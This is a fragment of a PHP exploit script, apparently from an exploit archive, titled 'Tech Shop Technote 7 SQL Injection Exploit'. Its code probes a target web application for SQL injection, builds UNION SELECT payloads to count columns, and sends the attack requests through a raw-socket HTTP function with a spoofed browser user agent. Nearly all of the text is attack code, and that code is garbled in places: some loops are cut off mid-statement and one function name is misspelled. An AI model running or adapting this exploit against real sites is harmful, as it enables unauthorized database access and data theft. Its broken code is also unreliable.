Success : SQL Injection
"; echo "Attack Pattern : ". $m_attackUrl . "
"; $m_status = "stop"; $m_attack_pattern[0] = $m_attackUrl; $m_attack_pattern[1] = $m_targetUrl; $m_attack_pattern[2] = $value; } } } if("stop" == $m_status) { $m_status_sqlinjection = true; break; } } echo "

"; //Union Check if($m_status_sqlinjection) { $res_data = null; for($i=1;$i<=$m_max_union;$i++) { if(1 == $i) { $m_unionPattern = " union all select $i"; } else { $m_unionPattern = $m_unionPattern . ",$i"; } $tmp_pattern = $m_attack_pattern[2].$m_unionPattern."--"; $m_attackUrl = $m_attack_pattern[1].urlencode($tmp_pattern); $m_packet = WWWScoket($m_host,$m_attackUrl); $m_packet = headerAndBody($m_packet); $m_packet[1] = str_replace($tmp_pattern,"",$m_packet[1]); $res_data[] = strlen($m_packet[1]); $m_status = ""; if(1 < count($res_data)) { for($i=1;$iSuccess : Union SQL Injection
"; echo "Attack Pattern: ". $m_attackUrl . "
"; echo "Column Count : ". ($i + 1) ."
"; $m_status = "stop"; $m_attack_pattern[0] = $m_attackUrl; $m_attack_pattern[1] = $m_targetUrl; $m_attack_pattern[2] = $tmp_pattern; } } } if("stop" == $m_status) { $m_status_union = true; break; } } } } //Socket------------------------------------------------------------------------------- function WWWScoket($F_HOST,$F_URL) { error_reporting(E_ALL); $F_PORT=getservbyname("www","tcp"); $F_HOST=gethostbyname($F_HOST); //전송 받은 데이터를 넣을 변수 초기화 $F_RESPONSEDATA=""; $F_SC=""; $F_HEADER = "GET $F_URL HTTP/1.1\r\n"; $F_HEADER .= "Accept: */*\r\n"; $F_HEADER .= "Host: $F_HOST\r\n"; $F_HEADER .= "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\r\n"; $F_HEADER .= "Connection: close\r\n\r\n"; //1 .소켓 생성 $F_SOCK=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); if($F_SOCK===false) { echo "소켓 생성 실패 : ".socket_strerror(socket_last_error())."
"; } //2. 소켓 연결 $F_CONN=socket_connect($F_SOCK,$F_HOST,$F_PORT); if($F_CONN===false) { echo "소켓 연결 실패 : ".socekt_strerror(socket_last_error($F_SOCK))."
"; } //3. 패킷 전송 socket_write($F_SOCK, $F_HEADER, strlen($F_HEADER)); //4. response 메시지 while($F_RESPONSEDATA=socket_read($F_SOCK,2048)) { $F_SC .= $F_RESPONSEDATA; } //5. 소켓 종료 socket_close($F_SOCK); return $F_SC; } function headerAndBody($post_results) { //header와 body 분리 $hunks = explode("\r\n\r\n",trim($post_results)); if(2 < count($hunks)) { $header = $hunks[0]; $body = strchr($post_results, "\r\n\r\n"); } else { $header = $hunks[count($hunks) - 2]; $body = $hunks[count($hunks) - 1]; } //chunked 방식인지 검사 $headers = explode("\n",$post_results); for($i=0;$i Tech Shop Technote 7 SQL Injection Exploit


Tech Shop Technote 7 SQL Injection Exploit

Vuln Author : MaJ3sty

Exploit Author : Khuti


Target :